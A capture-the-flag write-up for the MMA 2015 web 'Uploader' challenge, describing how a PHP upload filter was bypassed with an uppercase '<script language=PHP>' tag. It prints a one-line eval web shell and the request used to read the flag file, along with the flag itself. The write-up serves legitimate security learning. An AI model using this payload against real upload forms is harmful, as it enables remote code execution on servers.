English [MMA 2015] [Web – Uploader] Write Up

Description

The upload script removes all /<\?|php/. So you can not run php.

You can only upload file whose name is captured by the regexp /^[a-zA-Z0-9]+\.[a-zA-Z0-9]+$/.

Resolution

The statement is clear, we must successfully execute php code, despite the regexp blocking our attempts.

Usually we use <?php, <? or <?= to start a php code but the regexp removing “<?” and “php”, we find ourselves stuck.

A quick tour of the PHP documentation gives us a hint, it’s specified that the syntax “<script language=php>” which can bypass the regexp was removed in php 7. This is great, the HTTP headers of the webserver show us it is PHP/5.5.9-1ubuntu4.11.

We first tried to upload a file containing a small “<script language=php>echo time();</script>” but no, it failed, the regexp removed the word PHP in our code.

Oh, and if the regexp was case sensitive? Let’s send PHP in capital letters …

<script language=PHP>eval($_GET['q']);</script>

We attempt to read the flag, passing the argument “q=echo file_get_contents('/flag');” to our script and …

It works !

Flag is : MMA{you can run php from script tag}

2 thoughts on “[MMA 2015] [Web – Uploader] Write Up”

Leave a Reply

Your email address will not be published.